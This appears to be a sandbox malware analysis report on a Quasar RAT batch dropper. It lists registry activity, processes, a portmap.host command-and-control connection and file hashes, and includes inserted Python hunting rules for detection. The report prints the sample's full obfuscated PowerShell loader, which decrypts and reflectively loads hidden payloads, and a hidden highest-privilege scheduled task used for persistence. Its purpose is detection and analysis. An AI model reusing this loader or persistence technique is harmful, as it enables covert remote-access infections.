| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133626110297522421" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133626110483262536" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133626110909669242" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133626110487794071" | C:\Windows\system32\svchost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_3_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gE3sifTTayGc.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-63294.portmap.host | udp |
| DE | 193.161.193.99:63294 | runderscore00-63294.portmap.host | tcp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
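The process chain and network rows above give a compact set of hunting conditions: a cmd.exe whose command line echoes a PowerShell script into a hidden `powershell.exe -w hidden` child, string-reversal obfuscation such as `'daoL'[-1..-4] -join ''`, a `Register-ScheduledTask ... -RunLevel Highest` whose action lives under `AppData\Roaming`, WScript.exe running a .vbs from that same folder, a `ping -n 10 localhost` delay under a Temp .bat, and DNS for an external-IP service followed by a `*.portmap.host` name carrying the TCP session. The Python below is an added example written for this page, not code from the report or the sandbox; the process and DNS records in it are constructed to mirror the rows above (PIDs invented, the loader command line abridged), so the logic can be exercised offline.

```python
"""Hunting rules for the execution chain in this report, applied to constructed
process-creation and DNS records. Added example code, not from the page: the
records below are made up to mirror the "Processes" and "Network" rows of
behavioral1 (PIDs invented), so the logic can be exercised offline."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record in the shape of Sysmon event 1 / Security 4688."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Patterns taken from the command lines listed in the report.
ECHO_FUNCTION = re.compile(r'/c"?\s*echo\s+function\s+\w+', re.IGNORECASE)   # script echoed to stdin
REVERSED_STRING = re.compile(r"'[^']+'\[-1\.\.-\d+\]\s*-join\s*''")            # 'daoL'[-1..-4] -join ''
SCHED_TASK = re.compile(r"Register-ScheduledTask.*-RunLevel\s+Highest", re.IGNORECASE)
APPDATA_ROAMING = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)
PING_SLEEP = re.compile(r"\bping(\.exe)?\s+-n\s+\d+\s+(localhost|127\.0\.0\.1)\b", re.IGNORECASE)
IP_LOOKUP_DOMAINS = {"ip-api.com", "api.ipify.org", "freegeoip.net"}
TUNNEL_SUFFIXES = (".portmap.host",)   # port-forwarding service carrying the C2 session in behavioral1


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hunt_processes(events):
    """Return (rule, pid) pairs. Parent linkage is resolved through ppid."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = _basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = _basename(parent.image) if parent else ""
        cl = e.cmdline
        if name == "cmd.exe" and ECHO_FUNCTION.search(cl):
            hits.append(("cmd_echo_script_to_stdin", e.pid))
        if REVERSED_STRING.search(cl):
            hits.append(("reversed_string_obfuscation", e.pid))
        if name == "powershell.exe" and "-w hidden" in cl.lower() and pname == "cmd.exe" \
                and ECHO_FUNCTION.search(parent.cmdline):
            hits.append(("hidden_powershell_fed_by_cmd_echo", e.pid))
        if name == "powershell.exe" and SCHED_TASK.search(cl) and APPDATA_ROAMING.search(cl):
            hits.append(("schtask_highest_runlevel_appdata", e.pid))
        if name == "wscript.exe" and APPDATA_ROAMING.search(cl) and cl.lower().rstrip('" ').endswith(".vbs"):
            hits.append(("wscript_vbs_from_appdata", e.pid))
        if name == "ping.exe" and pname == "cmd.exe" and PING_SLEEP.search(cl):
            hits.append(("ping_localhost_delay", e.pid))
    return hits


def hunt_dns(queries):
    """queries: (pid, domain) pairs. Flags external-IP lookups and tunnelling hosts."""
    hits = []
    for pid, domain in queries:
        d = domain.lower().rstrip(".")
        if d in IP_LOOKUP_DOMAINS:
            hits.append(("external_ip_lookup", pid, d))
        elif d.endswith(TUNNEL_SUFFIXES):
            hits.append(("port_forwarding_service_c2", pid, d))
    return hits


# Constructed records mirroring behavioral1 (PIDs invented; loader line abridged).
SAMPLE_EVENTS = [
    ProcEvent(4000, 900, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat"'),
    ProcEvent(4001, 4000, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ '
              r"$aes_var=[System.Security.Cryptography.Aes]::Create(); (abridged) "
              r"$lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); }"),
    ProcEvent(4002, 4001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden'),
    ProcEvent(4003, 4002, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask '
              r"-TaskName '$phantom-RuntimeBroker_startup_3_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) "
              r"-Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs') "
              r"-RunLevel Highest -Force"),
    ProcEvent(4004, 901, r"C:\Windows\System32\WScript.exe",   # started by the Schedule service at logon
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs"'),
    ProcEvent(4005, 4002, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gE3sifTTayGc.bat" "'),
    ProcEvent(4006, 4005, r"C:\Windows\system32\PING.EXE", "ping -n 10 localhost"),
    ProcEvent(4007, 4000, r"C:\Windows\system32\PING.EXE", "ping -n 4 8.8.8.8"),   # control: must not fire
    ProcEvent(4008, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile Get-Process'),  # control
]
SAMPLE_DNS = [(4002, "8.8.8.8.in-addr.arpa"), (4002, "ip-api.com"),
              (4002, "runderscore00-63294.portmap.host"), (4002, "1.112.95.208.in-addr.arpa")]

if __name__ == "__main__":
    for hit in hunt_processes(SAMPLE_EVENTS) + hunt_dns(SAMPLE_DNS):
        print(hit)
```

The parent/child check matters more than any single string: `powershell.exe -w hidden` with no script on its command line is only interesting because its parent cmd.exe carried the script in an `echo`; matching on `-w hidden` alone would be noisy. The two control records (a ping to a public address and a plain `Get-Process`) are there to show that the rules stay quiet on ordinary use.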
Files
memory/932-0-0x00007FFFF8643000-0x00007FFFF8645000-memory.dmp
memory/932-1-0x0000014AD9D40000-0x0000014AD9D62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcad110i.zik.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/932-11-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/932-12-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/932-13-0x0000014ADA1A0000-0x0000014ADA1E4000-memory.dmp
memory/932-14-0x0000014ADA270000-0x0000014ADA2E6000-memory.dmp
memory/932-15-0x0000014AD9DA0000-0x0000014AD9DA8000-memory.dmp
memory/932-16-0x0000014ADA1F0000-0x0000014ADA260000-memory.dmp
memory/3088-27-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/3088-28-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/3088-29-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/3088-31-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.vbs
| MD5 | 6fcefd32acdcb283b971d6bf534fe606 |
| SHA1 | ef5a565bf17f800b8fe1e77f48885853dfccedc4 |
| SHA256 | 32ca545d319376eb8fcc60dfd82f77b34bbe7c9abbe2beb10c934668387455cb |
| SHA512 | dc956775fea6376cc936f286da1b03667ca1c25e975f1c0c4f68851ef482b4008f30348a1bb7a2ca954847a2dca273e7a654d79781faf181c945f98cfb1e3719 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_3.bat
| MD5 | a5c3bef843c9d6022db92547f32855d1 |
| SHA1 | 816338da7ee45d496f39bbd36c6b106ee0b3e2fe |
| SHA256 | ef70e618b652c777b3b2e589d1381bda6c7e49e7f2510334257c1e2add139045 |
| SHA512 | 0e44e31275a89f29388418538f57cb3437ad1d24f08d0c3c7d85a1a906c5b212024f2960237b66e3f2838923497e82f198ad8c4ed0b34548190e6db03504f1bd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |
memory/932-48-0x00007FFFF8640000-0x00007FFFF9101000-memory.dmp
memory/3404-95-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/3324-98-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2352-97-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1460-100-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2772-106-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/744-110-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1680-109-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1384-108-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/800-107-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1264-105-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2660-112-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1088-111-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2360-101-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/2648-104-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/952-103-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1144-102-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1368-99-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/1180-96-0x00007FF7D6A30000-0x00007FF7D6A40000-memory.dmp
memory/3404-49-0x00000000032C0000-0x00000000032EA000-memory.dmp
memory/4204-141-0x0000014332670000-0x00000143326CE000-memory.dmp
memory/4204-142-0x0000014332AD0000-0x0000014332AE2000-memory.dmp
memory/4204-143-0x0000014332B30000-0x0000014332B6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\gE3sifTTayGc.bat
| MD5 | f9a333f41255f2baf8f86d02b1c41c6d |
| SHA1 | a33be764cc1522d9dc5b51d78b3ac47a28d21f9b |
| SHA256 | 9404d0c315ec7f13f456854fb0e3d2ff8141b5c979beae70977f42a281b64e18 |
| SHA512 | 6c4bd2479681c8940a83a913e82e2a3cb626cf2b3b943fe570351d095d71f5bc7828a0e2f0845cc8b62f2f61a7cb42fc38f17b6008594869dda4365084b28145 |
C:\Users\Admin\AppData\Roaming\$sxr-Logs\06-11-~1
| MD5 | 43435dbb38b639f78be0a8f3a9f17bcb |
| SHA1 | 0d4c8ed716449eae09eaa9ff9ebb970fef9917c9 |
| SHA256 | d40292ea7921c41d6bba847456a2162dc07a8a3526f749f768d8af9d54750c24 |
| SHA512 | 022fb3bd3cd5d0e79fcbf99f4bfb94b4c20ea7ce9987df3c2bff4d647e11e0a3dae363cce26c5d11ca5a5de798a265fb59f1cb62c66f31069c346b6b92104997 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-11 20:23
Reported
2024-06-11 20:26
Platform
win11-20240508-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
